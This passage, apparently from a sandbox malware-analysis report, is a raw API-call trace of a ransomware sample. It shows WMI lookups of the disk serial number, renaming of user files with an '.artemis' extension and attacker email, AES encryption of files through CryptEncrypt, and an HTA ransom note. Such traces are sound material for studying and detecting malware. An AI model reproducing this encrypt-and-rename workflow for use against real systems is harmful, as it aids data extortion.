riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eea74 | out: ppvObject=0x71eea74*=0x781ce4) returned 0x0 [0199.384] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eea30 | out: ppvObject=0x71eea30*=0x0) returned 0x80004002 [0199.384] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee84c | out: ppvObject=0x71ee84c*=0x0) returned 0x80004002 [0199.385] WbemLocator:IUnknown:AddRef (This=0x781ce4) returned 0x3 [0199.385] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee38c | out: ppvObject=0x71ee38c*=0x0) returned 0x80004002 [0199.385] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee33c | out: ppvObject=0x71ee33c*=0x0) returned 0x80004002 [0199.385] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee348 | out: ppvObject=0x71ee348*=0x781c44) returned 0x0 [0199.385] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781c44, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee350 | out: pCid=0x71ee350*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.385] WbemLocator:IUnknown:Release (This=0x781c44) returned 0x3 [0199.385] CoGetContextToken (in: pToken=0x71ee3a8 | out: pToken=0x71ee3a8) returned 0x0 [0199.385] CoGetContextToken (in: pToken=0x71ee7b0 | out: pToken=0x71ee7b0) returned 0x0 [0199.385] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee840 | out: ppvObject=0x71ee840*=0x781ccc) returned 0x0 [0199.385] WbemLocator:IRpcOptions:Query (in: This=0x781ccc, pPrx=0x781ce4, dwProperty=2, pdwValue=0x71ee868 | out: pdwValue=0x71ee868) returned 0x80004002 [0199.385] WbemLocator:IUnknown:Release (This=0x781ccc) returned 0x3 [0199.386] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x2 [0199.386] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0199.386] CoGetContextToken (in: pToken=0x71eece8 | out: pToken=0x71eece8) returned 0x0 [0199.386] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x71eedb8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eedb4 | out: ppvObject=0x71eedb4*=0x67482bc) returned 0x0 [0199.386] WbemLocator:IUnknown:AddRef (This=0x67482bc) returned 0x4 [0199.386] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x3 [0199.386] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x2 [0199.386] SysStringLen (param_1=0x0) returned 0x0 [0199.386] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x71ef14c | out: puCount=0x71ef14c*=0x0) returned 0x0 [0199.386] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x71ef148*=0x0, pszText=0x0 | out: puBuffLength=0x71ef148*=0x20, pszText=0x0) returned 0x0 [0199.386] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x71ef148*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef148*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.386] CoGetContextToken (in: pToken=0x71eedb8 | out: pToken=0x71eedb8) returned 0x0 [0199.386] WbemLocator:IUnknown:AddRef (This=0x781ce4) returned 0x3 [0199.386] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eec4c | out: ppvObject=0x71eec4c*=0x781ce4) returned 0x0 [0199.386] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x3 [0199.386] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x2 [0199.386] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x71ef150*=0x0, pszText=0x0 | out: puBuffLength=0x71ef150*=0x20, pszText=0x0) returned 0x0 [0199.386] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x71ef150*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef150*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.386] IWbemServices:GetObject (in: This=0x67482bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef104*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef104*=0x673c128, ppCallResult=0x0) returned 0x0 [0199.674] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x71ef104 | out: puCount=0x71ef104*=0x2) returned 0x0 [0199.674] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x71ef100*=0x0, pszText=0x0 | out: puBuffLength=0x71ef100*=0xf, pszText=0x0) returned 0x0 [0199.674] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x71ef100*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef100*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.674] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef100*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3466878*=0, plFlavor=0x346687c*=0 | out: pVal=0x71ef100*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3466878*=8, plFlavor=0x346687c*=0) returned 0x0 [0199.674] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.674] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.674] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef108*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3466878*=8, plFlavor=0x346687c*=0 | out: pVal=0x71ef108*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3466878*=8, plFlavor=0x346687c*=0) returned 0x0 [0199.674] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.674] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.674] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x71eed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0199.675] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x6a [0199.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef168) returned 1 [0199.675] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), fInfoLevelId=0x0, lpFileInformation=0x71ef1e4 | out: lpFileInformation=0x71ef1e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1db2c760, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1ab30)) returned 1 [0199.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef164) returned 1 [0199.675] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0199.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x71eedac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x38 [0199.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x71eeda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x38 [0199.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eedac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0199.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef20c) returned 1 [0199.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef288 | out: lpFileInformation=0x71ef288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d55f1c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x1d55f1c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x1d55f1c0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0199.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef208) returned 1 [0199.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x71eed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x38 [0199.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1d4) returned 1 [0199.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x3466f28 | out: lpFileInformation=0x3466f28*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8de8eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x126da7)) returned 1 [0199.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1d0) returned 1 [0199.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x71eec14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x38 [0199.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef108) returned 1 [0199.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0199.677] GetFileType (hFile=0x3dc) returned 0x1 [0199.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef104) returned 1 [0199.677] GetFileType (hFile=0x3dc) returned 0x1 [0199.677] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x71ef210 | out: lpFileSizeHigh=0x71ef210*=0x0) returned 0x126da7 [0199.680] ReadFile (in: hFile=0x3dc, lpBuffer=0x2d3225d0, nNumberOfBytesToRead=0x126da7, lpNumberOfBytesRead=0x71ef1bc, lpOverlapped=0x0 | out: lpBuffer=0x2d3225d0*, lpNumberOfBytesRead=0x71ef1bc*=0x126da7, lpOverlapped=0x0) returned 1 [0199.707] CloseHandle (hObject=0x3dc) returned 1 [0199.707] CryptAcquireContextW (in: phProv=0x71ef15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x71ef15c*=0x7a9970) returned 1 [0199.915] CryptGenRandom (in: hProv=0x7a9970, dwLen=0x10, pbBuffer=0x34677c0 | out: pbBuffer=0x34677c0) returned 1 [0200.470] CryptImportKey (in: hProv=0x7a9970, pbData=0x350bb9c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x71ef12c | out: phKey=0x71ef12c*=0x77b5b0) returned 1 [0200.470] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0200.470] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0200.470] CryptDuplicateKey (in: hKey=0x77b5b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x71ef11c | out: phKey=0x71ef11c*=0x77adf0) returned 1 [0200.471] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0200.471] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x4, pbData=0x350bc7c*=0x1, dwFlags=0x0) returned 1 [0200.471] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x1, pbData=0x350bc48, dwFlags=0x0) returned 1 [0200.543] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e823d08*, pdwDataLen=0x71ef188*=0x126db0, dwBufLen=0x126db0 | out: pbData=0x2e823d08*, pdwDataLen=0x71ef188*=0x126db0) returned 1 [0200.593] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x350bca4*, pdwDataLen=0x71ef190*=0x0, dwBufLen=0x10 | out: pbData=0x350bca4*, pdwDataLen=0x71ef190*=0x10) returned 1 [0200.939] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0200.939] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0200.939] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0200.939] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x71eec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x38 [0200.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef0f4) returned 1 [0200.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0200.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edf30) returned 1 [0200.943] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0200.943] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0200.943] CoTaskMemFree (pv=0x9831858) [0200.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eebe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0200.943] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef130 | out: ppv=0x71ef130*=0x72015c) returned 0x0 [0200.943] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef128 | out: pAptType=0x71ef128*=1) returned 0x0 [0200.943] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef12c | out: ppvObject=0x71ef12c*=0x0) returned 0x80004002 [0200.943] IUnknown:Release (This=0x72015c) returned 0x1 [0200.944] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea98 | out: ppv=0x71eea98*=0x6736f48) returned 0x0 [0200.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eecb0 | out: ppvObject=0x71eecb0*=0x0) returned 0x80004002 [0200.945] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecc4 | out: ppvObject=0x71eecc4*=0x6738690) returned 0x0 [0200.945] WbemDefPath:IUnknown:Release (This=0x6736f48) returned 0x0 [0200.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e4 | out: ppvObject=0x71ee8e4*=0x6738690) returned 0x0 [0200.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee8a0 | out: ppvObject=0x71ee8a0*=0x0) returned 0x80004002 [0200.945] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0200.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1fc | out: ppvObject=0x71ee1fc*=0x0) returned 0x80004002 [0200.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee1ac | out: ppvObject=0x71ee1ac*=0x0) returned 0x80004002 [0200.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1b8 | out: ppvObject=0x71ee1b8*=0x77c078) returned 0x0 [0200.945] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c078, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1c0 | out: pCid=0x71ee1c0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.945] WbemDefPath:IUnknown:Release (This=0x77c078) returned 0x3 [0200.945] CoGetContextToken (in: pToken=0x71ee218 | out: pToken=0x71ee218) returned 0x0 [0200.945] CoGetContextToken (in: pToken=0x71ee620 | out: pToken=0x71ee620) returned 0x0 [0200.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee6b0 | out: ppvObject=0x71ee6b0*=0x0) returned 0x80004002 [0200.945] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0200.946] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0200.946] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0200.946] CoGetContextToken (in: pToken=0x71eef08 | out: pToken=0x71eef08) returned 0x0 [0200.946] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x71eefd8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefd4 | out: ppvObject=0x71eefd4*=0x6738690) returned 0x0 [0200.946] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0200.946] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0200.946] WbemDefPath:IWbemPath:SetText (This=0x6738690, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x71ef15c | out: puCount=0x71ef15c*=0x0) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x71ef158*=0x0, pszText=0x0 | out: puBuffLength=0x71ef158*=0x20, pszText=0x0) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x71ef158*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef158*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x71ef164 | out: puResponse=0x71ef164*=0xc19) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x71ef15c | out: puCount=0x71ef15c*=0x0) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x71ef164 | out: puResponse=0x71ef164*=0xc19) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x71ef164 | out: puResponse=0x71ef164*=0xc19) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x71ef0dc | out: puCount=0x71ef0dc*=0x0) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef0c8 | out: puCount=0x71ef0c8*=0x2) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef0c4*=0x0, pszText=0x0 | out: puBuffLength=0x71ef0c4*=0xf, pszText=0x0) returned 0x0 [0200.946] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef0c4*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef0c4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.946] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef078 | out: ppv=0x71ef078*=0x72015c) returned 0x0 [0200.947] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef070 | out: pAptType=0x71ef070*=1) returned 0x0 [0200.947] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x0) returned 0x80004002 [0200.947] IUnknown:Release (This=0x72015c) returned 0x1 [0200.948] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, 